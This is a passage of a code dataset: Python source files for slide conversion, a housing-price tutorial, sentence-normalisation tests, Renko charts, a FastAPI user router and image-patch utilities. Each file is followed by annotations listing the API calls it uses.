sampler=train_sampler,\n collate_fn=collate_fn, pin_memory=True)\n', (3241, 3351), False, 'from torch.utils.data import Dataset, DataLoader, BatchSampler\n'), ((3550, 3567), 'modules.utils.init_arg_parser', 'init_arg_parser', ([], {}), '()\n', (3565, 3567), False, 'from modules.utils import init_arg_parser\n'), ((3670, 3695), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (3693, 3695), False, 'import torch\n'), ((3700, 3761), 'torch.multiprocessing.spawn', 'mp.spawn', (['main'], {'args': '(args, n_gpus)', 'nprocs': 'n_gpus', 'join': '(True)'}), '(main, args=(args, n_gpus), nprocs=n_gpus, join=True)\n', (3708, 3761), True, 'import torch.multiprocessing as mp\n'), ((2905, 3036), 'fairseq.data.language_pair_dataset.collate', 'collate', (['samples', 'train_dataset.pad_idx', 'train_dataset.eos_idx'], {'left_pad_source': '(True)', 'left_pad_target': '(False)', 'input_feeding': '(True)'}), '(samples, train_dataset.pad_idx, train_dataset.eos_idx,\n left_pad_source=True, left_pad_target=False, input_feeding=True)\n', (2912, 3036), False, 'from fairseq.data.language_pair_dataset import collate\n')] |
#!/usr/bin/env python3
"""
intermediate yaml to markdown conversion
"""
import sys
import yaml
def yaml_to_markdown(yaml, outfile):
"""Given a list of dicts representing PowerPoint slides
-- presumably loaded from a YAML file -- convert to
markdown and print the result on the file-like
object 'outfile'.
"""
for slide in yaml:
slide_to_markdown(slide, outfile)
def get_title(slide):
"""return title or None. Deletes title from dict"""
shapes = slide["conts"]
found = False
for i, shape in enumerate(shapes):
if shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
found = True
title = shape
break
if found:
del shapes[i]
return title["String"].replace("\n", " ")
def slide_to_markdown(slide, outfile):
shapes = slide["conts"]
title = get_title(slide)
if not title:
title = "SLIDE"
print("### " + title + "\n", file=outfile)
for shape in shapes:
if shape["ShapeType"] == "com.sun.star.drawing.GraphicObjectShape":
add_graphic(shape, outfile)
# all Groups should've been converted to SVG
elif shape["ShapeType"] == "com.sun.star.drawing.GroupShape":
print("grouping ...\nslide title: ", title)
add_graphic(shape, outfile)
elif shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
out_str = "(TABLE not converted from PowerPoint)"
print(out_str + "\n", file=outfile)
elif "elements" in shape:
add_list(shape, outfile)
elif "String" in shape and shape["String"]:
add_text(shape, outfile)
else:
out_str = "<!-- sl: %(slideNum)s, shp: %(shapeNum)s, type: %(shapeType)s !-->" % {
"slideNum" : slide["slideNum"],
"shapeNum" : shape["shapeNum"],
"shapeType" : shape["ShapeType"] }
print(out_str + "\n", file=outfile)
def add_text(shape, outfile):
"""
convert a text-like Shape to a string, and
print to 'outfile'
"""
print( shape["String"].strip() + "\n", file=outfile)
def add_list(shape, outfile):
"""
Given a shape that represents an 'Outline' --
OpenOffice's representation of a bulleted or numbered
list -- attempt to convert the elements into
a sensible Markdown list, and write to
"outfile".
"""
els = shape["elements"]
indent = 0
def item_to_str(item):
s = (' ' * indent * 4) + "- " + item["String"].strip()
return s
# handle first item
output = [item_to_str(els[0])]
def dump_output():
print( "\n".join(output) + "\n", file=outfile)
if len(els) == 1:
dump_output()
return
# handle rest of items
last_el = els[0]
for el in els[1:]:
# int-ify the level if None
if el["NumberingLevel"] is None:
el["NumberingLevel"] = 0
if last_el["NumberingLevel"] is None:
last_el["NumberingLevel"] = 0
# new indent
if el["NumberingLevel"] > last_el["NumberingLevel"]:
indent += 1
elif el["NumberingLevel"] < last_el["NumberingLevel"]:
indent = max(0, indent-1)
else:
pass
#print(" new indent:", indent)
if len(el["String"]) > 1:
output.append(item_to_str(el))
last_el = el
dump_output()
def add_graphic(shape, outfile):
"""
Given a Shape representing some graphics object
(e.g. jpg, png, MetaFile, SVG), write out
the markdown to show it on "outfile".
"""
if "String" in shape and shape["String"]:
alt_text = shape["String"]
else:
alt_text = ""
if "exported_svg_filename" in shape:
filename = shape["exported_svg_filename"]
else:
filename = shape["exported_filename"]
link = "s)" % { "alt_text" : alt_text,
"filename" : filename }
print(link + "\n", file=outfile)
# typical image types:
# image/jpeg, image/png, image/gif
# text shapes:
# TextShape, NotesShape, SubtitleShape, OutlinerShape,
# TitleTextShape, ?CustomShape, possibly ?RectangleShape
def convert_file(input_file, output_file):
"""start an soffice server, then convert input file to output file
using image dir."""
with open(input_file, "r") as input:
y = yaml.load(input, Loader=yaml.SafeLoader)
with open(output_file, "w") as output:
yaml_to_markdown(y, output)
MAIN="__main__"
#MAIN=None
def main():
"""main"""
args = sys.argv[1:]
if len(args) != 2:
print("usage: pptx-to-md.py INPUT_FILE OUTPUT_FILE")
sys.exit(1)
input_file, output_file = args
convert_file(input_file, output_file)
if __name__ == MAIN:
main()
| [
"yaml.load",
"sys.exit"
] | [((4159, 4199), 'yaml.load', 'yaml.load', (['input'], {'Loader': 'yaml.SafeLoader'}), '(input, Loader=yaml.SafeLoader)\n', (4168, 4199), False, 'import yaml\n'), ((4436, 4447), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4444, 4447), False, 'import sys\n')] |
"""
Copyright <NAME> College
MIT License
Spring 2020
Contains the Display module of the racecar_core library
"""
import cv2 as cv
import os
from nptyping import NDArray
from display import Display
class DisplayReal(Display):
__WINDOW_NAME: str = "RACECAR display window"
__DISPLAY: str = ":1"
def __init__(self):
self.__display_found = (
self.__DISPLAY
in os.popen(
"cd /tmp/.X11-unix && for x in X*; do echo \":${x#X}\"; done "
).read()
)
if self.__display_found:
os.environ["DISPLAY"] = self.__DISPLAY
else:
print(f"Display {self.__DISPLAY} not found.")
def create_window(self) -> None:
if self.__display_found:
cv.namedWindow(self.__WINDOW_NAME)
else:
pass
def show_color_image(self, image: NDArray) -> None:
if self.__display_found:
cv.imshow(self.__WINDOW_NAME, image)
cv.waitKey(1)
else:
pass
| [
"os.popen",
"cv2.waitKey",
"cv2.namedWindow",
"cv2.imshow"
] | [((765, 799), 'cv2.namedWindow', 'cv.namedWindow', (['self.__WINDOW_NAME'], {}), '(self.__WINDOW_NAME)\n', (779, 799), True, 'import cv2 as cv\n'), ((933, 969), 'cv2.imshow', 'cv.imshow', (['self.__WINDOW_NAME', 'image'], {}), '(self.__WINDOW_NAME, image)\n', (942, 969), True, 'import cv2 as cv\n'), ((982, 995), 'cv2.waitKey', 'cv.waitKey', (['(1)'], {}), '(1)\n', (992, 995), True, 'import cv2 as cv\n'), ((406, 476), 'os.popen', 'os.popen', (['"""cd /tmp/.X11-unix && for x in X*; do echo ":${x#X}"; done """'], {}), '(\'cd /tmp/.X11-unix && for x in X*; do echo ":${x#X}"; done \')\n', (414, 476), False, 'import os\n')] |
import pandas as pd
melbourne_file_path = './melbourne_housing_data.csv'
melbourne_data = pd.read_csv(melbourne_file_path)
melbourne_data.dropna(axis=0)
y = melbourne_data.Price
melbourne_features = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']
X = melbourne_data[melbourne_features]
X.describe()
X.head(n=10)
from sklearn.tree import DecisionTreeRegressor
melbourne_model = DecisionTreeRegressor(random_state=1)
#Fit model
melbourne_model.fit(X,y)
#Make predictions for first five rows
#print(X.head())
#Predictions
#print(melbourne_model.predict(X.head()))
#What is Model Validation
#You'll want to evaluate almost every model you ever build. In most (though not all) applications, the relevant measure of model quality is predictive accuracy. In other words, will the model's predictions be close to what actually happens.
#
#Many people make a huge mistake when measuring predictive accuracy. They make predictions with their training data and compare those predictions to the target values in the training data. You'll see the problem with this approach and how to solve it in a moment, but let's think about how we'd do this first.
#
#You'd first need to summarize the model quality into an understandable way. If you compare predicted and actual home values for 10,000 houses, you'll likely find mix of good and bad predictions. Looking through a list of 10,000 predicted and actual values would be pointless. We need to summarize this into a single metric.
#
#There are many metrics for summarizing model quality, but we'll start with one called Mean Absolute Error (also called MAE). Let's break down this metric starting with the last word, error.
from sklearn.metrics import mean_absolute_error
predicted_home_prices = melbourne_model.predict(X)
mean_absolute_error(y,predicted_home_prices)
#The Problem with "In-Sample" Scores
#The measure we just computed can be called an "in-sample" score. We used a single "sample" of houses for both building the model and evaluating it. Here's why this is bad.
#
#Imagine that, in the large real estate market, door color is unrelated to home price.
#
#However, in the sample of data you used to build the model, all homes with green doors were very expensive. The model's job is to find patterns that predict home prices, so it will see this pattern, and it will always predict high prices for homes with green doors.
#
#Since this pattern was derived from the training data, the model will appear accurate in the training data.
#
#But if this pattern doesn't hold when the model sees new data, the model would be very inaccurate when used in practice.
#
#Since models' practical value come from making predictions on new data, we measure performance on data that wasn't used to build the model. The most straightforward way to do this is to exclude some data from the model-building process, and then use those to test the model's accuracy on data it hasn't seen before. This data is called validation data.
from sklearn.model_selection import train_test_split
# split data into training and validation data, for both features and target
# The split is based on a random number generator. Supplying a numeric value to
# the random_state argument guarantees we get the same split every time we
# run this script.
train_X,test_X,train_y,test_y = train_test_split(X,y,random_state=0)
#Define the model
melbourne_model = DecisionTreeRegressor()
#Fit the model
melbourne_model.fit(train_X,train_y)
# get predicted prices on validation data
test_predictions = melbourne_model.predict(test_X)
mean_absolute_error(test_y,test_predictions)
| [
"sklearn.model_selection.train_test_split",
"sklearn.metrics.mean_absolute_error",
"sklearn.tree.DecisionTreeRegressor",
"pandas.read_csv"
] | [((92, 124), 'pandas.read_csv', 'pd.read_csv', (['melbourne_file_path'], {}), '(melbourne_file_path)\n', (103, 124), True, 'import pandas as pd\n'), ((396, 433), 'sklearn.tree.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {'random_state': '(1)'}), '(random_state=1)\n', (417, 433), False, 'from sklearn.tree import DecisionTreeRegressor\n'), ((1787, 1832), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['y', 'predicted_home_prices'], {}), '(y, predicted_home_prices)\n', (1806, 1832), False, 'from sklearn.metrics import mean_absolute_error\n'), ((3333, 3371), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'random_state': '(0)'}), '(X, y, random_state=0)\n', (3349, 3371), False, 'from sklearn.model_selection import train_test_split\n'), ((3408, 3431), 'sklearn.tree.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {}), '()\n', (3429, 3431), False, 'from sklearn.tree import DecisionTreeRegressor\n'), ((3581, 3626), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['test_y', 'test_predictions'], {}), '(test_y, test_predictions)\n', (3600, 3626), False, 'from sklearn.metrics import mean_absolute_error\n')] |
import unittest
from textwrap import dedent
from normalize_sentences import normalize_sentences
class NormalizeSentencesTests(unittest.TestCase):
"""Tests for normalize_sentences."""
maxDiff = 1000
def test_no_sentences(self):
sentence = "This isn't a sentence"
self.assertEqual(normalize_sentences(sentence), sentence)
def test_one_sentence(self):
sentence = "This is a sentence."
self.assertEqual(normalize_sentences(sentence), sentence)
def test_two_sentences(self):
sentences = ["Sentence 1.", "Sentence 2."]
self.assertEqual(
normalize_sentences(" ".join(sentences)),
" ".join(sentences),
)
def test_multiple_punctuation_marks(self):
sentences = ["Sentence 1!", "Sentence 2?", "Sentence 3."]
self.assertEqual(
normalize_sentences(" ".join(sentences)),
" ".join(sentences),
)
def test_multiple_paragraphs(self):
sentences = dedent("""
This is a paragraph. With two sentences in it.
And this is one. With three. Three short sentences.
""").strip()
expected = dedent("""
This is a paragraph. With two sentences in it.
And this is one. With three. Three short sentences.
""").strip()
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_no_extra_spaces(self):
sentences = """
Sentence 1. And two spaces after. But one space after this.
"""
expected = """
Sentence 1. And two spaces after. But one space after this.
"""
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_with_abbreviations_and_numbers(self):
sentences = "P.S. I like fish (e.g. salmon). That is all."
expected = "P.S. I like fish (e.g. salmon). That is all."
self.assertEqual(
normalize_sentences(sentences),
expected,
)
sentences = "I ate 5.5 oranges. They cost $.50 each. They were good."
expected = "I ate 5.5 oranges. They cost $.50 each. They were good."
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_excluded_words_work(self):
sentences = (
"Do you know about the work of Dr. <NAME>? You can "
"find out what she did by using google.com. Google is used by "
"1.17 billion people (as of December 2012). That's a lot people!"
)
expected = (
"Do you know about the work of Dr. <NAME>? You can "
"find out what she did by using google.com. Google is used by "
"1.17 billion people (as of December 2012). That's a lot people!"
)
self.assertEqual(
normalize_sentences(sentences),
expected,
)
if __name__ == "__main__":
unittest.main(verbosity=2)
| [
"unittest.main",
"textwrap.dedent",
"normalize_sentences.normalize_sentences"
] | [((3354, 3380), 'unittest.main', 'unittest.main', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (3367, 3380), False, 'import unittest\n'), ((313, 342), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentence'], {}), '(sentence)\n', (332, 342), False, 'from normalize_sentences import normalize_sentences\n'), ((454, 483), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentence'], {}), '(sentence)\n', (473, 483), False, 'from normalize_sentences import normalize_sentences\n'), ((1376, 1406), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (1395, 1406), False, 'from normalize_sentences import normalize_sentences\n'), ((1843, 1873), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (1862, 1873), False, 'from normalize_sentences import normalize_sentences\n'), ((2241, 2271), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (2260, 2271), False, 'from normalize_sentences import normalize_sentences\n'), ((2500, 2530), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (2519, 2530), False, 'from normalize_sentences import normalize_sentences\n'), ((3257, 3287), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (3276, 3287), False, 'from normalize_sentences import normalize_sentences\n'), ((1004, 1161), 'textwrap.dedent', 'dedent', (['"""\n This is a paragraph. With two sentences in it.\n\n And this is one. With three. Three short sentences.\n """'], {}), '(\n """\n This is a paragraph. With two sentences in it.\n\n And this is one. With three. Three short sentences.\n """\n )\n', (1010, 1161), False, 'from textwrap import dedent\n'), ((1179, 1339), 'textwrap.dedent', 'dedent', (['"""\n This is a paragraph. With two sentences in it.\n\n And this is one. With three. Three short sentences.\n """'], {}), '(\n """\n This is a paragraph. With two sentences in it.\n\n And this is one. With three. Three short sentences.\n """\n )\n', (1185, 1339), False, 'from textwrap import dedent\n')] |
import atrlib
import pandas as pd
# module for calculation of data for renko graph
def renko(df):
d , l , h ,lbo ,lbc,vol=[],[],[],[],[],[]
brick_size = atrlib.brick_size(df)
volume = 0.0
for i in range(0,len(df)):
if i==0:
if(df['close'][i]>df['open'][i]):
d.append(df['date'][i])
l.append(df['open'][i])
h.append(df["close"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
d.append(df['date'][i])
l.append(df['close'][i])
h.append(df["open"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
volume += df["volume"][i]
leng = len(lbo)
if(lbc[leng-1]>lbo[leng-1]):
if(df["close"][i]>=(lbc[leng-1]+brick_size)):
lbc.append((lbc[leng-1]+brick_size))
lbo.append(lbc[leng-1])
l.append(lbc[leng-1])
h.append((lbc[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbo[leng-1]-brick_size)):
lbc.append((lbo[leng-1]-brick_size))
lbo.append(lbo[leng-1])
h.append(lbo[leng-1])
l.append((lbo[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
else:
if(df["close"][i]>=(lbo[leng-1]+brick_size)):
lbc.append((lbo[leng-1]+brick_size))
lbo.append(lbo[leng-1])
l.append(lbo[leng-1])
h.append((lbo[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbc[leng-1]-brick_size)):
lbc.append((lbc[leng-1]-brick_size))
lbo.append(lbc[leng-1])
h.append(lbc[leng-1])
l.append((lbc[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
data_ = pd.DataFrame(d,columns=["date"])
data_["open"] = lbo
data_["close"] =lbc
data_["low"] = l
data_["high"] = h
data_['volume']=vol
return data_
| [
"pandas.DataFrame",
"atrlib.brick_size"
] | [((162, 183), 'atrlib.brick_size', 'atrlib.brick_size', (['df'], {}), '(df)\n', (179, 183), False, 'import atrlib\n'), ((2506, 2539), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {'columns': "['date']"}), "(d, columns=['date'])\n", (2518, 2539), True, 'import pandas as pd\n')] |
import os
import pathlib
import requests
import shutil
import subprocess
import time
ENV_PATHS = set()
def add_path_to_env(path):
ENV_PATHS.add(path)
def run_command(command, timeout=-1):
if type(command) == str:
command = str.split(command, ' ')
my_env = os.environ.copy()
my_env["PATH"] += ":"+str.join(":", ENV_PATHS)
try:
if timeout > 0:
completed_process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=my_env, timeout=timeout)
else:
completed_process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=my_env)
except subprocess.TimeoutExpired:
raise TimeoutError(f"command {' '.join(command)} timeout")
if completed_process.stderr != b'':
error_info = completed_process.stderr.decode()
raise RuntimeError(f"during execution: {' '.join(command)} exception occurred\n{error_info}")
else:
return completed_process.stdout.decode('utf-8')
def search_files_in_paths(paths: list, pattern: str):
files = []
for path in paths:
if not path.exists():
print(f"Unable to locate {path}.")
continue
if path.is_dir():
files.extend(list(path.glob("**/*"+pattern)))
else:
if not path.name.endswith(pattern):
print(f"{path} is not an {pattern} file which is excepted format.")
else:
files.append(path)
return files
def download_file(url, path):
with requests.get(url, stream=True) as r:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
def chunks(lst, n):
if n == 1:
return [lst]
output = []
for i in range(n):
output.append(lst[i::n])
return output
def create_unix_timestamp_folder(parent_path):
parent_path = pathlib.Path(parent_path)
start = str(time.time())
path = (parent_path / start)
while path.exists():
time.sleep(1)
start = str(time.time())
path = (parent_path / start)
path.mkdir(parents=True)
return path
def merge_files_binary(file_paths: list, output_path: pathlib.Path):
with open(output_path, 'wb') as writer:
for input_file in file_paths:
with open(input_file, 'rb') as reader:
shutil.copyfileobj(reader, writer)
def parse_input_paths(input_list, project_name, parent_directory):
if input_list is None:
input_paths = [pathlib.Path(parent_directory / project_name)]
else:
input_paths = []
for input_path in [pathlib.Path(x) for x in input_list]:
if input_path.is_absolute():
input_paths.append(input_path)
else:
input_paths.append(parent_directory / input_path)
return input_paths
| [
"shutil.copyfileobj",
"pathlib.Path",
"subprocess.run",
"requests.get",
"time.sleep",
"os.environ.copy",
"time.time"
] | [((282, 299), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (297, 299), False, 'import os\n'), ((1880, 1905), 'pathlib.Path', 'pathlib.Path', (['parent_path'], {}), '(parent_path)\n', (1892, 1905), False, 'import pathlib\n'), ((1551, 1581), 'requests.get', 'requests.get', (['url'], {'stream': '(True)'}), '(url, stream=True)\n', (1563, 1581), False, 'import requests\n'), ((1922, 1933), 'time.time', 'time.time', ([], {}), '()\n', (1931, 1933), False, 'import time\n'), ((2001, 2014), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2011, 2014), False, 'import time\n'), ((417, 522), 'subprocess.run', 'subprocess.run', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'env': 'my_env', 'timeout': 'timeout'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env\n =my_env, timeout=timeout)\n', (431, 522), False, 'import subprocess\n'), ((564, 652), 'subprocess.run', 'subprocess.run', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'env': 'my_env'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env\n =my_env)\n', (578, 652), False, 'import subprocess\n'), ((1636, 1664), 'shutil.copyfileobj', 'shutil.copyfileobj', (['r.raw', 'f'], {}), '(r.raw, f)\n', (1654, 1664), False, 'import shutil\n'), ((2035, 2046), 'time.time', 'time.time', ([], {}), '()\n', (2044, 2046), False, 'import time\n'), ((2504, 2549), 'pathlib.Path', 'pathlib.Path', (['(parent_directory / project_name)'], {}), '(parent_directory / project_name)\n', (2516, 2549), False, 'import pathlib\n'), ((2613, 2628), 'pathlib.Path', 'pathlib.Path', (['x'], {}), '(x)\n', (2625, 2628), False, 'import pathlib\n'), ((2350, 2384), 'shutil.copyfileobj', 'shutil.copyfileobj', (['reader', 'writer'], {}), '(reader, writer)\n', (2368, 2384), False, 'import shutil\n')] |
from typing import List
from fastapi import APIRouter
from fastapi.params import Depends
from fastapi import HTTPException, status
from sqlalchemy.orm.session import Session
from project import schema, models, database, hashing
router = APIRouter(
prefix="/user",
tags=['Users']
)
@router.post('/new')
def create_user(request:schema.User, db:Session = Depends(database.get_db)):
hashed_pass = hashing.get_password_hash(request.password)
new_user = models.User(name = request.name,username = request.username, password = hashed_pass)
db.add(new_user)
db.commit()
db.refresh(new_user)
return request
@router.get('/find', response_model= List[schema.showUser])
def show_user_all(db:Session=Depends(database.get_db)):
all_users = db.query(models.User).all()
return all_users
@router.get('/find/{id}',response_model= schema.showUser)
def show_user_id(id:int, db:Session = Depends(database.get_db)):
selected_project = db.query(models.User).filter(models.User.id == id).first()
if not selected_project:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"User {id} not found.")
return selected_project
# @router.put('/{id}')
# def update_project_id(id:int,request:schema.Project,db:Session = Depends(database.get_db)):
# #Search for projects' id
# selected_project = db.query(models.Project).filter(models.Project.id == id)
# if not selected_project.first():
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# selected_project.update(dict(request))
# return {'status':f'project {id} updated'}
# @router.delete('/{id}')
# def delete_project_id(id:int,db:Session = Depends(database.get_db)):
# selected_project = db.query(models.Project).filter(models.Project.id == id).first()
# if not selected_project:
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# db.delete(selected_project)
# db.commit()
# return {'status':f'delete project_id {id} successful'}
| [
"project.models.User",
"fastapi.HTTPException",
"fastapi.params.Depends",
"fastapi.APIRouter",
"project.hashing.get_password_hash"
] | [((238, 279), 'fastapi.APIRouter', 'APIRouter', ([], {'prefix': '"""/user"""', 'tags': "['Users']"}), "(prefix='/user', tags=['Users'])\n", (247, 279), False, 'from fastapi import APIRouter\n'), ((362, 386), 'fastapi.params.Depends', 'Depends', (['database.get_db'], {}), '(database.get_db)\n', (369, 386), False, 'from fastapi.params import Depends\n'), ((407, 450), 'project.hashing.get_password_hash', 'hashing.get_password_hash', (['request.password'], {}), '(request.password)\n', (432, 450), False, 'from project import schema, models, database, hashing\n'), ((466, 545), 'project.models.User', 'models.User', ([], {'name': 'request.name', 'username': 'request.username', 'password': 'hashed_pass'}), '(name=request.name, username=request.username, password=hashed_pass)\n', (477, 545), False, 'from project import schema, models, database, hashing\n'), ((722, 746), 'fastapi.params.Depends', 'Depends', (['database.get_db'], {}), '(database.get_db)\n', (729, 746), False, 'from fastapi.params import Depends\n'), ((911, 935), 'fastapi.params.Depends', 'Depends', (['database.get_db'], {}), '(database.get_db)\n', (918, 935), False, 'from fastapi.params import Depends\n'), ((1064, 1153), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': 'status.HTTP_404_NOT_FOUND', 'detail': 'f"""User {id} not found."""'}), "(status_code=status.HTTP_404_NOT_FOUND, detail=\n f'User {id} not found.')\n", (1077, 1153), False, 'from fastapi import HTTPException, status\n')] |
import os
import cv2
import torch
from torch.nn import functional as F
from torchvision import transforms
import torchvision.utils
def save_image(img, path):
os.makedirs(os.path.dirname(path), exist_ok=True)
torchvision.utils.save_image(torch.clip(img, -1, 1), path, normalize=True)
def cv2pt(img):
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img / 255.
img = img * 2 - 1
img = torch.from_numpy(img.transpose(2, 0, 1)).float()
return img
def aspect_ratio_resize(img, max_dim=256):
h, w, c = img.shape
if max(h, w) / max_dim > 1:
img = cv2.blur(img, ksize=(5, 5))
if w > h:
h = int(h/w*max_dim)
w = max_dim
else:
w = int(w/h*max_dim)
h = max_dim
return cv2.resize(img, (w, h), interpolation=cv2.INTER_AREA)
def downscale(img, pyr_factor):
assert 0 < pyr_factor < 1
new_w = int(pyr_factor * img.shape[-1])
new_h = int(pyr_factor * img.shape[-2])
return transforms.Resize((new_h, new_w), antialias=True)(img)
def blur(img, pyr_factor):
"""Blur image by downscaling and then upscaling it back to original size"""
if pyr_factor < 1:
d_img = downscale(img, pyr_factor)
img = transforms.Resize(img.shape[-2:], antialias=True)(d_img)
return img
def get_pyramid(img, min_height, pyr_factor):
res = [img]
while True:
img = downscale(img, pyr_factor)
if img.shape[-2] < min_height:
break
res = [img] + res
# ensure smallest size is of min_height
if res[0].shape[-2] != min_height:
new_width = int(min_height * res[0].shape[-1] / float(res[0].shape[-2]))
res[0] = transforms.Resize((min_height, new_width), antialias=True)(res[0])
res = [x.unsqueeze(0) for x in res]
return res
def match_image_sizes(input, target):
"""resize and crop input image so that it has the same aspect ratio as target"""
assert(len(input.shape) == len(target.shape) and len(target.shape) == 4)
input_h, input_w = input.shape[-2:]
target_h, target_w = target.shape[-2:]
input_scale_factor = input_h / input_w
target_scale_factor = target_h / target_w
if target_scale_factor > input_scale_factor:
input = transforms.Resize((target_h, int(input_w/input_h*target_h)), antialias=True)(input)
pixels_to_cut = input.shape[-1] - target_w
if pixels_to_cut > 0:
input = input[:, :, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
else:
input = transforms.Resize((int(input_h/input_w*target_w), target_w), antialias=True)(input)
pixels_to_cut = input.shape[-2] - target_h
if pixels_to_cut > 1:
input = input[:, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
input = transforms.Resize(target.shape[-2:], antialias=True)(input)
return input
def extract_patches(src_img, patch_size, stride):
"""
Splits the image to overlapping patches and returns a pytorch tensor of size (N_patches, 3*patch_size**2)
"""
channels = 3
patches = F.unfold(src_img, kernel_size=patch_size, dilation=(1, 1), stride=stride, padding=(0, 0)) # shape (b, 3*p*p, N_patches)
patches = patches.squeeze(dim=0).permute((1, 0)).reshape(-1, channels * patch_size**2)
return patches
def combine_patches(patches, patch_size, stride, img_shape):
"""
Combines patches into an image by averaging overlapping pixels
:param patches: patches to be combined. pytorch tensor of shape (N_patches, 3*patch_size**2)
:param img_shape: an image of a shape that if split into patches with the given stride and patch_size will give
the same number of patches N_patches
returns an image of shape img_shape
"""
patches = patches.permute(1,0).unsqueeze(0)
combined = F.fold(patches, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
# normal fold matrix
input_ones = torch.ones(img_shape, dtype=patches.dtype, device=patches.device)
divisor = F.unfold(input_ones, kernel_size=patch_size, dilation=(1, 1), stride=stride, padding=(0, 0))
divisor = F.fold(divisor, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
divisor[divisor == 0] = 1.0
return (combined / divisor).squeeze(dim=0).unsqueeze(0) | [
"torch.clip",
"os.path.dirname",
"torch.nn.functional.fold",
"torch.nn.functional.unfold",
"cv2.cvtColor",
"torchvision.transforms.Resize",
"cv2.resize",
"cv2.blur",
"torch.ones"
] | [((321, 357), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_BGR2RGB'], {}), '(img, cv2.COLOR_BGR2RGB)\n', (333, 357), False, 'import cv2\n'), ((753, 806), 'cv2.resize', 'cv2.resize', (['img', '(w, h)'], {'interpolation': 'cv2.INTER_AREA'}), '(img, (w, h), interpolation=cv2.INTER_AREA)\n', (763, 806), False, 'import cv2\n'), ((3054, 3147), 'torch.nn.functional.unfold', 'F.unfold', (['src_img'], {'kernel_size': 'patch_size', 'dilation': '(1, 1)', 'stride': 'stride', 'padding': '(0, 0)'}), '(src_img, kernel_size=patch_size, dilation=(1, 1), stride=stride,\n padding=(0, 0))\n', (3062, 3147), True, 'from torch.nn import functional as F\n'), ((3805, 3892), 'torch.nn.functional.fold', 'F.fold', (['patches'], {'output_size': 'img_shape[-2:]', 'kernel_size': 'patch_size', 'stride': 'stride'}), '(patches, output_size=img_shape[-2:], kernel_size=patch_size, stride=\n stride)\n', (3811, 3892), True, 'from torch.nn import functional as F\n'), ((3931, 3996), 'torch.ones', 'torch.ones', (['img_shape'], {'dtype': 'patches.dtype', 'device': 'patches.device'}), '(img_shape, dtype=patches.dtype, device=patches.device)\n', (3941, 3996), False, 'import torch\n'), ((4011, 4107), 'torch.nn.functional.unfold', 'F.unfold', (['input_ones'], {'kernel_size': 'patch_size', 'dilation': '(1, 1)', 'stride': 'stride', 'padding': '(0, 0)'}), '(input_ones, kernel_size=patch_size, dilation=(1, 1), stride=stride,\n padding=(0, 0))\n', (4019, 4107), True, 'from torch.nn import functional as F\n'), ((4118, 4205), 'torch.nn.functional.fold', 'F.fold', (['divisor'], {'output_size': 'img_shape[-2:]', 'kernel_size': 'patch_size', 'stride': 'stride'}), '(divisor, output_size=img_shape[-2:], kernel_size=patch_size, stride=\n stride)\n', (4124, 4205), True, 'from torch.nn import functional as F\n'), ((177, 198), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (192, 198), False, 'import os\n'), ((248, 270), 'torch.clip', 'torch.clip', (['img', '(-1)', '(1)'], {}), '(img, -1, 1)\n', (258, 270), False, 'import torch\n'), ((590, 617), 